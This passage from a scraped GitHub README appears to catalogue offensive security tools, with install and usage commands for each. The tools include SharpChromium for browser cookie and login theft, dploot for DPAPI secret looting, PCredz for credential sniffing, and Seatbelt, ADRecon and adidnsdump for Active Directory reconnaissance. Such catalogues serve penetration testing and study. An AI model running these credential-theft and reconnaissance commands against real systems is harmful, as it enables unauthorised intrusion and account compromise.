https://github.com/dafthack/MailSniper cd MailSniper Import-Module MailSniper.ps1 </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Search current users mailbox Invoke-SelfSearch -Mailbox current-user@domain.com"><pre><span class="pl-c"><span class="pl-c">#</span> Search current users mailbox</span> Invoke-SelfSearch -Mailbox current-user@domain.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png"><img src="https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://patrowl.io/" 
rel="nofollow">https://patrowl.io/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/djhohnstein/SharpChromium">SharpChromium</a></h3><a id="user-content-sharpchromium" class="anchor" aria-label="Permalink: 🔙SharpChromium" href="#sharpchromium"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. 
Currently, it can extract:</p> <ul dir="auto"> <li>Cookies (in JSON format)</li> <li>History (with associated cookies for each history item)</li> <li>Saved Logins</li> </ul> <p dir="auto">This rewrite has several advantages to previous implementations, which include:</p> <ul dir="auto"> <li>No Type compilation or reflection required</li> <li>Cookies are displayed in JSON format, for easy importing into Cookie Editor.</li> <li>No downloading SQLite assemblies from remote resources.</li> <li>Supports major Chromium browsers (but extendable to others)</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/downloads/" rel="nofollow">Visual Studio Community Edition</a>.</p> <p dir="auto">Open up the project .sln, choose "release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Retrieve cookies associated with Google Docs and Github .\SharpChromium.exe cookies docs.google.com github.com # Retrieve history items and their associated cookies. 
.\SharpChromium.exe history # Retrieve saved logins (Note: Only displays those with non-empty passwords): .\SharpChromium.exe logins"><pre><span class="pl-c"><span class="pl-c">#</span> Retrieve cookies associated with Google Docs and Github</span> .<span class="pl-cce">\S</span>harpChromium.exe cookies docs.google.com github.com <span class="pl-c"><span class="pl-c">#</span> Retrieve history items and their associated cookies.</span> .<span class="pl-cce">\S</span>harpChromium.exe <span class="pl-c1">history</span> <span class="pl-c"><span class="pl-c">#</span> Retrieve saved logins (Note: Only displays those with non-empty passwords):</span> .<span class="pl-cce">\S</span>harpChromium.exe logins</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png"><img src="https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/djhohnstein/SharpChromium">https://github.com/djhohnstein/SharpChromium</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/zblurx/dploot">dploot</a></h3><a id="user-content-dploot" class="anchor" aria-label="Permalink: 🔙dploot" href="#dploot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 
4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">DPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So, to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc.), we just need access to a password.</p> <p dir="auto">dploot is a Python rewrite of SharpDPAPI, written in C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a Python interpreter and from a Linux environment.</p> <p dir="auto"><a href="https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" rel="nofollow">Blog - Operational Guidance for Offensive User DPAPI Abuse</a></p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install dploot"><pre>pip install dploot</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/zblurx/dploot.git cd dploot make"><pre>git clone https://github.com/zblurx/dploot.git <span class="pl-c1">cd</span> dploot make</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Loot decrypted machine private key files as a Windows local administrator dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet # Loot the DPAPI backup key as a Windows Domain 
Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user) dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet # Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet "><pre><span class="pl-c"><span class="pl-c">#</span> Loot decrypted machine private key files as a Windows local administrator </span> dploot machinecertificates -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.14 -quiet <span class="pl-c"><span class="pl-c">#</span> Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)</span> dploot backupkey -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.112 -quiet <span class="pl-c"><span class="pl-c">#</span> Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints</span> dploot certificates -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.14 -pvk key.pvk -quiet </pre></div> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Discovery</h1><a id="user-content-discovery" class="anchor" aria-label="Permalink: Discovery" href="#discovery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 
0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/lgandx/PCredz">PCredz</a></h3><a id="user-content-pcredz" class="anchor" aria-label="Permalink: 🔙PCredz" href="#pcredz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/lgandx/PCredz"><pre>git clone https://github.com/lgandx/PCredz</pre></div> <p dir="auto"><strong>Usage:</strong> (PCAP File Folder)</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./Pcredz -d 
/tmp/pcap-directory-to-parse/"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">Pcredz</span> <span class="pl-c1">-</span><span class="pl-s1">d</span> <span class="pl-c1">/</span><span class="pl-s1">tmp</span><span class="pl-c1">/</span><span class="pl-s1">pcap</span><span class="pl-c1">-</span><span class="pl-s1">directory</span><span class="pl-c1">-</span><span class="pl-s1">to</span><span class="pl-c1">-</span><span class="pl-s1">parse</span><span class="pl-c1">/</span></pre></div> <p dir="auto"><strong>Usage:</strong> (Live Capture)</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./Pcredz -i eth0 -v"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">Pcredz</span> <span class="pl-c1">-</span><span class="pl-s1">i</span> <span class="pl-s1">eth0</span> <span class="pl-c1">-</span><span class="pl-s1">v</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png"><img src="https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vletoux/pingcastle">PingCastle</a></h3><a id="user-content-pingcastle" class="anchor" aria-label="Permalink: 🔙PingCastle" href="#pingcastle"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Ping Castle is a tool designed to quickly assess the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather at an efficiency compromise.</p> <p dir="auto"><strong>Install:</strong> (Download)</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip"><pre class="notranslate"><code>https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./PingCastle.exe"><pre>.<span class="pl-c1">/</span><span class="pl-v">PingCastle</span>.<span class="pl-c1">exe</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png"><img src="https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Seatbelt">Seatbelt</a></h3><a id="user-content-seatbelt" class="anchor" aria-label="Permalink: 🔙Seatbelt" href="#seatbelt"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" 
aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.</p> <p dir="auto">It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with <a href="https://visualstudio.microsoft.com/downloads/" rel="nofollow">Visual Studio Community Edition</a>.</p> <p dir="auto">Open up the project .sln, choose "release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all checks and output to output.txt Seatbelt.exe -group=all -full > output.txt # Return 4624 logon events for the last 30 days Seatbelt.exe "LogonEvents 30" # Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.* Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true" # Run remote-focused checks against a remote system Seatbelt.exe -group=remote 
-computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"""><pre><span class="pl-c"><span class="pl-c">#</span> Run all checks and output to output.txt</span> Seatbelt.exe -group=all -full <span class="pl-k">></span> output.txt <span class="pl-c"><span class="pl-c">#</span> Return 4624 logon events for the last 30 days</span> Seatbelt.exe <span class="pl-s"><span class="pl-pds">"</span>LogonEvents 30<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*</span> Seatbelt.exe <span class="pl-s"><span class="pl-pds">"</span>reg <span class="pl-cce">\"</span>HKLM\SOFTWARE\Microsoft\Windows Defender<span class="pl-cce">\"</span> 3 .*defini.* true<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Run remote-focused checks against a remote system</span> Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE<span class="pl-cce">\s</span>am -password=<span class="pl-s"><span class="pl-pds">"</span>yum <span class="pl-cce">\"</span>po-ta-toes<span class="pl-cce">\"</span><span class="pl-pds">"</span></span></pre></div> <p dir="auto">Full command groups and parameters can be found <a href="https://github.com/GhostPack/Seatbelt#command-groups">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png"><img src="https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://exord66.github.io/csharp-in-memory-assemblies" rel="nofollow">https://exord66.github.io/csharp-in-memory-assemblies</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a 
href="#tool-list">🔙</a><a href="https://github.com/sense-of-security/adrecon">ADRecon</a></h3><a id="user-content-adrecon" class="anchor" aria-label="Permalink: 🔙ADRecon" href="#adrecon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.</p> <p dir="auto">It can be run from any workstation that is connected to the environment, even hosts that are not domain members.</p> <p dir="auto"><a href="https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation" rel="nofollow">BlackHat USA 2018 SlideDeck</a></p> <p dir="auto"><strong>Prerequisites</strong></p> <ul dir="auto"> <li>.NET Framework 3.0 or later (Windows 7 includes 3.0)</li> <li>PowerShell 2.0 or later (Windows 7 includes 2.0)</li> </ul> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/sense-of-security/ADRecon.git"><pre>git clone https://github.com/sense-of-security/ADRecon.git</pre></div> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can download a zip archive of the <a 
href="https://github.com/sense-of-security/ADRecon/archive/master.zip">latest release</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# To run ADRecon on a domain member host. PS C:\> .\ADRecon.ps1 # To run ADRecon on a domain member host as a different user. PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon on a non-member host using LDAP. PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter) PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers"><pre><span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a domain member host.</span> PS C:<span class="pl-cce">\></span> .<span class="pl-cce">\A</span>DRecon.ps1 <span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a domain member host as a different user.</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a non-member host using LDAP.</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -Protocol LDAP -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> To run ADRecon with specific modules on a non-member host with RSAT. 
(Default OutputType is STDOUT with -Collect parameter)</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -Protocol ADWS -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> -Collect Domain, DomainControllers</pre></div> <p dir="auto">Full usage and parameter information can be found <a href="https://github.com/sense-of-security/adrecon#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png"><img src="https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://vk9-sec.com/domain-enumeration-powerview-adrecon/" rel="nofollow">https://vk9-sec.com/domain-enumeration-powerview-adrecon/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/dirkjanm/adidnsdump">adidnsdump</a></h3><a id="user-content-adidnsdump" class="anchor" aria-label="Permalink: 🔙adidnsdump" href="#adidnsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z"></path></svg></a></div> <p dir="auto">By default, any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.</p> <p dir="auto">This tool enables enumeration and exporting of all DNS records in the zone for reconnaissance of internal networks.</p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump"><pre>pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/dirkjanm/adidnsdump cd adidnsdump pip install ."><pre>git clone https://github.com/dirkjanm/adidnsdump <span class="pl-c1">cd</span> adidnsdump pip install <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Note:</strong> <em>The tool requires <code>impacket</code> and <code>dnspython</code> to function. 
While the tool works with both Python 2 and 3, Python 3 support requires you to install <a href="https://github.com/CoreSecurity/impacket">impacket from GitHub</a>.</em></p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Display the zones in the domain where you are currently in adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp # Display all zones in the domain adidnsdump -u icorp\\testuser icorp-dc.internal.corp # Resolve all unknown records (-r) adidnsdump -u icorp\\testuser icorp-dc.internal.corp -r"><pre><span class="pl-c"><span class="pl-c">#</span> Display the zones in the domain where you are currently in</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser --print-zones icorp-dc.internal.corp <span class="pl-c"><span class="pl-c">#</span> Display all zones in the domain</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser icorp-dc.internal.corp <span class="pl-c"><span class="pl-c">#</span> Resolve all unknown records (-r)</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser icorp-dc.internal.corp -r</pre></div> <p dir="auto"><a href="https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/" rel="nofollow">Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg"><img src="https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg" alt="adidnsdump" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/" 
rel="nofollow">https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ropnop/kerbrute">kerbrute</a></h3><a id="user-content-kerbrute" class="anchor" aria-label="Permalink: 🔙kerbrute" href="#kerbrute"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.</p> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go get github.com/ropnop/kerbrute"><pre>go get github.com/ropnop/kerbrute</pre></div> <p dir="auto"><strong>Install: (Make)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/ropnop/kerbrute cd kerbrute make all"><pre>git clone https://github.com/ropnop/kerbrute <span class="pl-c1">cd</span> kerbrute make all</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
